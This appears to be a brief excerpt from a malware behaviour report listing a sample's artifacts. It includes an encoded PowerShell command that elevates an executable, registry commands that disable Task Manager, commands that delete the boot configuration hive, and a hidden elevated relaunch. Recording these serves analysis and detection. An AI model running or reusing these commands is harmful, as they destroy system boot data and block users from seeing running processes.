Technical Information
- Windows Task Manager (Taskmgr)
- %HOMEPATH%\desktop\logs.txt
- nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABuAHcAdwBiAGIAdwBtAG8AXABpAGwAagB0AG4ALgBlAHgAZQAnACAALQBBAHIAZwB1AG0AZ...
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c reg delete HKLM\BCD00000000 /f
- '<SYSTEM32>\reg.exe' delete HKLM\BCD00000000 /f
- '<Full path to file>' --elevated (with hidden window)